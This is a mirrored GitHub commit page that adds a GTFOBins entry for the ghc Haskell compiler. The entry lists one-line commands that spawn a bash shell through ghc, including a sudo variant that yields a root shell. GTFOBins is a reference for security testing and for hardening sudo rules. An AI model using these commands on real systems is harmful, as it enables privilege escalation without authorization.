mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
Add ghc binary
This commit is contained in:
parent
a49cccf7da
commit
106dede9da
7
_gtfobins/ghc.md
Normal file
7
_gtfobins/ghc.md
Normal file
@ -0,0 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: ghc -e 'System.Process.callCommand "/bin/bash"'
|
||||
sudo:
|
||||
- code: sudo ghc -e 'System.Process.callCommand "/bin/bash"'
|
||||
---
|
Loading…
Reference in New Issue
Block a user